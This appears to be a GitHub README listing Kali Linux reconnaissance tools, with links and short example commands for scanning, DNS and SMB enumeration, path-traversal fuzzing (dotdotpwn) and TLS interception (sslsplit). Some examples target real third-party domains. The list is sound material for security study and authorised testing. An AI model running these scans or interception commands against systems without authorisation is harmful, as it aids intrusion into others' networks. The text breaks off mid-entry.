## Information Gathering * [whois](https://www.tecmint.com/whois-command-get-domain-and-ip-address-information/)&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPZPTF4VDCZFD3CFVAK6WVY3S)](https://www.youtube.com/watch?v=mOrWk-80ObA) ``` whois google.com whois 216.58.206.46 ``` * [nbtscan](https://www.darknet.org.uk/2017/09/nbtscan-download-netbios-scanner-for-windows-linux/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/scallywag/nbtscan)&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=ePwBHxjOdJ4) ``` nbtstat -A 192.168.1.99 nbtscan -f addresses.txt ``` * [fping](https://fping.org/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://github.com/schweikert/fping)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=knRDczIQo8Q) ``` fping 50.116.66.139 173.194.35.35 98.139.183.24 fping -s -g 192.168.0.1 192.168.0.9 fping -g -r 1 192.168.0.0/24 ``` * [tcptraceroute](https://linux.die.net/man/1/tcptraceroute)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/mct/tcptraceroute)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=BvPQJVLHPjQ) ``` tcptraceroute api.opendns.com 443 tcptraceroute -T domainname ``` * [traceroute](https://linux.die.net/man/8/traceroute)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=5xsYgLB5oZs) ``` traceroute example.com ``` * [xprobe2](https://linux.die.net/man/1/xprobe2)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=YE-9SVE5agc) ``` xprobe2 google.com xprobe2 -D 11 google.com ``` * [sslyze](https://tools.kali.org/information-gathering/sslyze)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/nabla-c0d3/sslyze)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=nX8c-fixnvQ) ``` sslyze --regular bugcrowd.com ``` * [tcpdump](https://opensource.com/article/18/10/introduction-tcpdump)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/the-tcpdump-group/tcpdump)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=1lDfCRM6dWk) ``` tcpdump host 1.1.1.1 tcpdump -i eth0 ``` * [tshark](https://www.wireshark.org/docs/man-pages/tshark.html)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/wireshark/wireshark)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=dKQ2Cuq3sqo) ``` tshark -i wlan0 -w capture-output.pcap tshark -r capture-output.pcap ``` * [wireshark](https://www.wireshark.org/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/wireshark/wireshark)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=Yo8zGbCbqd0) ``` wireshark ``` * [subbrute](https://github.com/TheRook/subbrute)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/TheRook/subbrute)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=C-OPJafxUBs) ``` ./subbrute.py target.com ``` * [dnsenum](https://tools.kali.org/information-gathering/dnsenum)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/dnsenum)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=c3Ts6F2OcWk) ``` dnsenum --enum hackthissite.org dnsenum hackthissite.org ``` * [dnsrecon](https://tools.kali.org/information-gathering/dnsrecon)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/dnsrecon)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=ob9Efx7d_vA) ``` ./dnsrecon.py -d <domain> ./dnsrecon.py -d <domain> -t axfr ``` * [dnstracer](https://tools.kali.org/information-gathering/dnstracer)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/dnstracer)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=MQgvNIx0Qss) ``` dnstracer www.mavetju.org ``` * [enum4linux](https://tools.kali.org/information-gathering/enum4linux)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/enum4linux)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=hA5raaGOQKQ) ``` enum4linux -v 172.168.0.6 enum4linux -u 192.168.2.55 ``` * [hping3](https://tools.kali.org/information-gathering/hping3)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/hping3)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=ykJpPjDrtZQ) ``` hping3 -S 192.168.1.10 -p 80 hping3 โ€“traceroute -S {target ip} ``` * [dotdotpwn](https://tools.kali.org/information-gathering/dotdotpwn)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/dotdotpwn)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=3fbC33OcHv8) ``` dotdotpwn.pl -m http -h 192.168.1.1 -M GET ``` * [golismero](https://tools.kali.org/information-gathering/golismero)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/golismero)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=z02inpQ--TU) ``` golismero scan http://www.0x00sec.org golismero scan http://www.0x00sec.org -o /root/scan.txt ``` * [netmask](https://chousensha.github.io/blog/2017/07/07/netmask-kali-linux-tools/)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=qtXfoIvkjxo) ``` netmask -c google.com netmask -r 192.168.217.0/24 ``` * [knock](https://kalilinuxtutorials.com/knock-enumerate-subdomains/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/guelfoweb/knock)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=KOmcO9jF4O8) ``` knockpy domain.com knockpy domain.com -w wordlist.txt ``` * [lbd](https://tools.kali.org/information-gathering/lbd)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](http://gitlab.com/kalilinux/packages/lbd)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=ESnSsQVigZs) ``` lbd example.com ``` * [angryFuzzer](http://www.techtrick.in/description/3542-angryfuzzer-tool-for-information-gathering-on-kali-linux)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/ihebski/angryFuzzer)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=2LtjJmqISL0) ``` python angryFuzzer.py -u http://www.techtrick.in ``` * [miranda](https://tools.kali.org/information-gathering/miranda)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/miranda)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=_tSbhB4kLkY) ``` miranda -i eth0 -v ``` * [ncat](http://knoxd3.blogspot.com/2013/07/how-to-use-ncat-in-kali-linux.html)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/nmap/nmap/tree/master/ncat)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=abxNX-KZjrc) ``` ncat 192.168.1.100 80 ``` * [wafw00f](https://null-byte.wonderhowto.com/how-to/identify-web-application-firewalls-with-wafw00f-nmap-0198145/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/EnableSecurity/wafw00f)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=EmWXfq51pE0) ``` wafw00f https://equifaxsecurity2017.com ``` * [inforfinder](https://devhub.io/repos/ggusoft-inforfinder)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/ggusoft/inforfinder)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=i_qmAM8Y0bU) ``` python inforfinder.py --help ``` * [masscan](https://tools.kali.org/information-gathering/masscan)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/masscan)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=JyDweRaBgXk) ``` masscan -p22,80,445 192.168.1.0/24 masscan 10.0.0.0/8 192.168.0.0/16 172.16.0.0/12 -p80 ``` * [faraday](https://tools.kali.org/information-gathering/faraday)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/python-faraday)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=chykh_WtqNA) ``` python-faraday -h ``` * [tlssled](https://tools.kali.org/information-gathering/tlssled)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/tlssled)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=D6PuHT6sVQI) ``` tlssled 192.168.1.1 443 ``` * [sslsplit](https://tools.kali.org/information-gathering/sslsplit)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/sslsplit)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=D6PuHT6sVQI) ``` sslsplit -D -l connections.log -j /tmp/sslsplit/ -S /tmp/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080 ``` * [dmitry](https://tools.kali.org/information-gathering/dmitry)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/dmitry)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=1gDI79z4oqM) ``` dmitry -winsepo example.txt example.com dmitry -wise -o Comrade.txt scanme.nmap.org ``` * [urlcrazy](https://tools.kali.org/information-gathering/urlcrazy)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://tools.kali.org/information-gathering/urlcrazy) ``` urlcrazy -k dvorak -r example.com ``` * admin-panel-finder &nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/bdblackhat/admin-panel-finder)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=r1k2lgvK3s0) * [dnsmap](https://tools.kali.org/information-gathering/dnsmap)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/dnsmap)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=hRoTp6mkrsQ) ``` ./dnsmap google.com ``` * [dnmap_client](#)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=Vm3NbFUxxjM) ``` dnmap_client -s <server-ip> -a <alias></alias></server-ip> ``` * [dnswalk](https://tools.kali.org/information-gathering/dnswalk)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/davebarr/dnswalk)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=LLCcb0IgAtk) ``` dnswalk -r -d example.com. dnswalk example.com. ``` * [fierce](https://tools.kali.org/information-gathering/fierce)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/fierce)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=5fCU1YsF2Cs) ``` fierce -dns example.com -threads 10 ``` * [fragrouter](https://tools.kali.org/information-gathering/fragrouter)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/fragrouter)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=UYV5mwchQ2A) ``` fragrouter -i eth0 -F1 ``` * ftest &nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=JwzV7JqwBX0) ``` ./ftest -f ftest.conf ``` * [arping](https://kalilinuxtutorials.com/arping/)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=butXaR4Wwms) ``` arping 192.168.122.1 arping -s aa:bb:cc:dd:ee:ff 192.168.122.1 arping -c 2 192.168.122.1 ``` * [cdpsnarf](https://tools.kali.org/information-gathering/cdpsnarf)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/cdpsnarf)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=kwgmtaZx-AY) ``` cdpsnarf -i eth0 -w cdpsnarf.pcap ``` * [unicornscan](https://tools.kali.org/information-gathering/unicornscan)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/unicornscan)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=X _DdYUeKS-o) ``` unicornscan -v -I -mT [IP ADDRESS] unicornscan -mTsf -Iv -r 1000 192.168.0.102:a ``` * [nmap](https://tools.kali.org/information-gathering/nmap)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/nmap)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=5MTZdN9TEO4) ``` nmap cloudflare.com nmap --top-ports 20 192.168.1.106 nmap -oX output.xml securitytrails.com ``` * [theHarvester](https://tools.kali.org/information-gathering/theharvester)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/laramies/theHarvester)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=NioRu6s4_xk) ``` theHarvester -d sixthstartech.com -l 300 -b all theHarvester.py -d wonderhowto.com -b all -l 200 ``` * [twofi](https://tools.kali.org/information-gathering/twofi)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/digininja/twofi)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=ASde4fZ3ByY) ``` twofi -h ``` * [maltego](https://www.maltego.com/?utm_source=paterva.com&utm_medium=referral&utm_campaign=301)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=zemNLx0-LRw) * [0trace](https://www.aldeid.com/wiki/0trace)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=U5xDRcny7ZA) ``` ./0trace.sh wlan0 69.63.181.12 ``` * [intrace](https://tools.kali.org/information-gathering/intrace)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/robertswiecki/intrace)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=4Cb8ZD28J2E) ``` intrace -h hostname.com -p port -s sizeofpacket intrace -h www.example.com -p 80 -s 4 ``` * irpas-ass &nbsp;&nbsp;&nbsp; * irpas-cdp &nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=j95zk3b2tpM) * [netdiscover](https://kalilinuxtutorials.com/netdiscover-scan-live-hosts-network/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/netdiscover-scanner/netdiscover)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=58jhmvaxNFk) ``` netdiscover -i eth0 -r 192.168.43.0/24 ``` * [smbmap](https://tools.kali.org/information-gathering/smbmap)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/ShawnDEvans/smbmap)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=Nt0CE3Km8Nw) ``` smbmap -u victim -p s3cr3t -H 192.168.86.61 smbmap -H 192.168.1.102 ``` * [snmp-check](https://tools.kali.org/information-gathering/snmp-check)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/snmpcheck)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=OqfvpkZODEg) ``` snmp-check 192.168.1.2 -c public ``` * [swaks](https://installlion.com/kali/kali/main/s/swaks/install/index.html)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://github.com/jetmore/swaks)&nbsp;&nbsp;&nbsp; ``` swaks --to [email 